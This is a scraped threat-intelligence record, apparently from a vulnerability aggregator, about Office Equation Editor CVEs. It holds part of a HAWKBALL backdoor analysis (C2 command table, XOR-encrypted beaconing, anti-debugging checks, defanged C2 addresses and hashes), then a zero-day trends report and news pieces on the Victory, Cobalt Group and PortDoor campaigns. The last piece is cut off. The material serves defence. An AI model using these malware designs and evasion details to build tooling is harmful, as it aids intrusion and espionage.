As shown in Figure 10, the field Set-Cookie responds with ID=17.\n\nThis Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor\u2019s command.\n\n \nFigure 12: Function table\n\nTable 3 shows the commands supported by HAWKBALL.\n\n**Command** | **Operation Performed** \n---|--- \n0 | Set URI query string to value \n16 | Unknown \n17 | Collect system information \n18 | Execute a provided argument using CreateProcess \n19 | Execute a provided argument using CreateProcess and upload output \n20 | Create a cmd.exe reverse shell, execute a command, and upload output \n21 | Shut down reverse shell \n22 | Unknown \n23 | Shut down reverse shell \n48 | Download file \n64 | Get drive geometry and free space for logical drives C-Z \n65 | Retrieve information about provided directory \n66 | Delete file \n67 | Move file \n\nTable 3: HAWKBALL commands\n\n#### Collect System Information\n\nCommand ID 17 indexes to a function that collects the system information and sends it to the C2 server. 
The system information includes:\n\n * Computer Name\n * User Name\n * IP Address\n * Active Code Page\n * OEM Page\n * OS Version\n * Architecture Details (x32/x64)\n * String at 0x68 offset from decrypted config file\n\nThis information is retrieved from the victim using the following WINAPI calls:\n\n * GetComputerNameA\n * GetUserNameA\n * gethostbyname and inet_ntoa\n * GetACP\n * GetOEMCP\n * GetCurrentProcess and IsWow64Process\n\nThe fields are assembled with the following format string:\n\n**Format = \"%s;%s;%s;%d;%d;%s;%s %dbit\"**\n\n \nFigure 13: System information\n\nThe collected system information is concatenated together with a semicolon separating each field:\n\nWIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit\n\nThis information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is **0xE5044C18**.\n\nOnce encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.\n\n \nFigure 14: POST request\n\nIn the request header, the field **Cookie** is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.\n\nTable 4 shows the parameters of this POST request.\n\n**Parameter** | **Information** \n---|--- \ne | Initially set to 0 \nt | Decimal form of the little-endian XOR key \nk | The result of GetTickCount() \n\nTable 4: POST request parameters\n\n##### Create Process\n\nThe malware creates a process with specified arguments. Figure 15 shows the operation.\n\n \nFigure 15: Command create process\n\n##### Delete File\n\nThe malware deletes the file specified as an argument. 
Figure 16 shows the operation.\n\nFigure 16: Delete file operation\n\n##### Get Directory Information\n\nThe malware gets information for the provided directory address using the following WINAPI calls:\n\n * FindFirstFileW\n * FindNextFileW\n * FileTimeToLocalFileTime\n * FileTimeToSystemTime\n\nFigure 17 shows the API used for collecting information.\n\nFigure 17: Get directory information\n\n##### Get Disk Information\n\nThis command retrieves the drive information for drives C through Z along with available disk space for each drive.\n\nFigure 18: Retrieve drive information\n\nThe information is stored in the following format for each drive:\n\n**Format = \"%d+%d+%d+%d;\"**\n\nExample: \"8+512+6460870+16751103;\"\n\nThe information for all the available drives is combined and sent to the server using an operation similar to Figure 14.\n\n#### Anti-Debugging Tricks\n\n##### Debugger Detection With PEB\n\nThe malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.\n\nFigure 19: Retrieve value from PEB\n\n##### NtQueryInformationProcess\n\nThe malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:\n\n * Passing value 0x7 to ProcessInformationClass:\n\nFigure 20: ProcessDebugPort verification\n\n * Passing value 0x1E to ProcessInformationClass:\n\nFigure 21: ProcessDebugFlags verification\n\n * Passing value 0x1F to ProcessInformationClass:\n\nFigure 22: ProcessDebugObject\n\n#### Conclusion\n\nHAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. 
We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Indicators of Compromise (IOC)\n\n| MD5 | Name |\n|---|---|\n| AC0EAC22CE12EAC9EE15CA03646ED70C | Doc.rtf |\n| D90E45FBF11B5BBDCA945B24D155A4B2 | hh14980443.wll |\n\n#### Network Indicators\n\n * 149.28.182[.]78:443\n * 149.28.182[.]78:80\n * http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>\n * Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)\n\n#### FireEye Detections\n\n| MD5 | Product | Signature | Action |\n|---|---|---|---|\n| AC0EAC22CE12EAC9EE15CA03646ED70C | FireEye Email Security; FireEye Network Security; FireEye Endpoint Security | FE_Exploit_RTF_EQGEN_7; Exploit.Generic.MVX | Block |\n| D90E45FBF11B5BBDCA945B24D155A4B2 | FireEye Email Security; FireEye Network Security; FireEye Endpoint Security | Malware.Binary.Dll; FE_APT_Backdoor_Win32_HawkBall_1; APT.Backdoor.Win.HawkBall | Block |\n\n#### Acknowledgement\n\nThank you to Matt Williams for providing reverse engineering support.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T15:00:00", "type": "fireeye", "title": "Government Sector in Central Asia Targeted With New HAWKBALL 
Backdoor\nDelivered via Microsoft Office Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-06-05T15:00:00", "id": "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "href": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-30T08:30:41", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nFireEye Mandiant Threat Intelligence documented more zero-days exploited in 2019 than any of the previous three years. While not every instance of zero-day exploitation can be attributed to a tracked group, we noted that a wider range of tracked actors appear to have gained access to these capabilities. 
Furthermore, we noted a significant increase over time in the number of zero-days leveraged by groups suspected to be customers of companies that supply offensive cyber capabilities, as well as an increase in zero-days used against targets in the Middle East, and/or by groups with suspected ties to this region. Going forward, we are likely to see a greater variety of actors using zero-days, especially as private vendors continue feeding the demand for offensive cyber weapons.\n\n#### Zero-Day Usage by Country and Group\n\nSince late 2017, FireEye Mandiant Threat Intelligence noted a significant increase in the number of zero-days leveraged by groups that are known or suspected to be customers of private companies that supply offensive cyber tools and services. Additionally, we observed an increase in zero-days leveraged against targets in the Middle East, and/or by groups with suspected ties to this region.\n\n\n\nExamples include:\n\n * A group described by researchers as [Stealth Falcon](<https://citizenlab.ca/2016/05/stealth-falcon/> \"https://citizenlab.ca/2016/05/stealth-falcon/\" ) and [FruityArmor](<https://www.securityweek.com/windows-zero-day-exploited-fruityarmor-sandcat-threat-groups> \"https://www.securityweek.com/windows-zero-day-exploited-fruityarmor-sandcat-threat-groups\" ) is an espionage group that has reportedly [targeted journalists and activists in the Middle East](<https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/>). In 2016, this group used malware sold by NSO group, which leveraged three iOS zero-days. From 2016 to 2019, this group used more zero-days than any other group.\n * The activity dubbed SandCat in open sources, suspected to be linked to [Uzbekistan state intelligence](<https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec>), has been observed using zero-days in operations against targets in the Middle East. 
This group may have acquired their zero-days by purchasing malware from private companies such as NSO group, as the zero-days used in SandCat operations were also used in Stealth Falcon operations, and it is unlikely that these distinct activity sets independently discovered the same three zero-days.\n * Throughout 2016 and 2017, activity referred to in open sources as [BlackOasis](<https://www.securityweek.com/middle-east-group-uses-flash-zero-day-deliver-spyware>), which also primarily targets entities in the Middle East and likely acquired at least one zero-day in the past from [private company Gamma Group](<https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/>), demonstrated similarly frequent access to zero-day vulnerabilities.\n\nWe also noted examples of zero-day exploitation that have not been attributed to tracked groups but that appear to have been leveraged in tools provided by private offensive security companies, for instance:\n\n * In 2019, a zero-day exploit in WhatsApp (CVE-2019-3568) was [reportedly used to distribute spyware](<https://www.itpro.co.uk/spyware/33632/whatsapp-call-hack-installs-spyware-on-users-phones>) developed by NSO group, an Israeli software company.\n * FireEye analyzed activity targeting a Russian healthcare organization that leveraged a 2018 Adobe Flash zero-day (CVE-2018-15982) that may be linked to leaked source code of Hacking Team.\n * Android zero-day vulnerability CVE-2019-2215 was [reportedly being exploited in the wild](<https://thehackernews.com/2019/10/android-kernel-vulnerability.html>) in October 2019 by NSO Group tools.\n\n_Zero-Day Exploitation by Major Cyber Powers_\n\nWe have continued to see exploitation of zero days by espionage groups of major cyber powers.\n\n * According to researchers, the Chinese espionage group APT3 exploited CVE-2019-0703 in [targeted attacks in 
2016](<https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>).\n * FireEye observed North Korean group APT37 conduct a 2017 campaign that leveraged Adobe Flash vulnerability CVE-2018-4878. This group has also demonstrated an increased capacity to quickly exploit vulnerabilities shortly after they have been disclosed.\n * From December 2017 to January 2018, we observed multiple Chinese groups leveraging CVE-2018-0802 in a campaign targeting multiple industries throughout Europe, Russia, Southeast Asia, and Taiwan. At least three out of six samples were used before the patch for this vulnerability was issued.\n * In 2017, Russian groups APT28 and Turla leveraged multiple zero-days in Microsoft Office products. \n\nIn addition, we believe that some of the most dangerous state sponsored intrusion sets are increasingly demonstrating the ability to quickly exploit vulnerabilities that have been made public. In multiple cases, groups linked to these countries have been able to weaponize vulnerabilities and incorporate them into their operations, aiming to take advantage of the window between disclosure and patch application. \n\n_Zero-Day Use by Financially Motivated Actors_\n\nFinancially motivated groups have and continue to leverage zero-days in their operations, though with less frequency than espionage groups.\n\nIn May 2019, we reported that FIN6 used a Windows server 2019 use-after-free zero-day (CVE-2019-0859) in a targeted intrusion in February 2019. Some evidence suggests that the group may have used the exploit since August 2018. 
While open sources have suggested that the group potentially acquired the zero-day from criminal underground actor \"[BuggiCorp](<https://www.ibtimes.com/hacker-selling-windows-zero-days-worlds-most-dangerous-hacker-groups-2789374>),\" we have not identified direct evidence linking this actor to this exploit's development or sale.\n\n#### Conclusion\n\nWe surmise that access to zero-day capabilities is becoming increasingly commodified based on the proportion of zero-days exploited in the wild by suspected customers of private companies. Possible reasons for this include:\n\n * Private companies are likely creating and supplying a larger proportion of zero-days than they have in the past, resulting in a concentration of zero-day capabilities among highly resourced groups.\n * Private companies may be increasingly providing offensive capabilities to groups with lower overall capability and/or groups with less concern for operational security, which makes it more likely that usage of zero-days will be observed.\n\nIt is likely that state groups will continue to support internal exploit discovery and development; however, the availability of zero-days through private companies may offer a more attractive option than relying on domestic solutions or underground markets. As a result, we expect that the number of adversaries demonstrating access to these kinds of vulnerabilities will almost certainly increase and will do so at a faster rate than the growth of their overall offensive cyber capabilities\u2014provided they have the ability and will to spend the necessary funds.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar. \n\n_Sourcing Note: Some vulnerabilities and zero-days were identified based on FireEye research, Mandiant breach investigation findings, and other technical collections. 
This paper also references vulnerabilities and zero-days discussed in open sources including _[_Google Project Zero's zero-day \"In the Wild\" Spreadsheet_](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/view#gid=1123292625>)_. While we believe these sources are reliable as used in this paper, we do not vouch for the complete findings of those sources. Due to the ongoing discovery of past incidents, we expect that this research will remain dynamic._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-06T00:00:00", "type": "fireeye", "title": "Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2018-15982", "CVE-2018-4878", "CVE-2019-0703", "CVE-2019-0859", "CVE-2019-2215", "CVE-2019-3568"], "modified": "2020-04-06T00:00:00", "id": "FIREEYE:A819772457030262D1150428E2B4438C", "href": 
"https://www.fireeye.com/blog/threat-research/2020/04/zero-day-exploitation-demonstrates-access-to-money-not-skill.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0798", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. 
Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0802", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. 
But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulting DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. 
\u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. 
Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the firm said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which are China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained an internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. 
\u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group first burst onto the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. 
Researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on targets\u2019 computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. 
These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. 
EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. 
The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. 
RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. 
This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which it awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * File enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. 
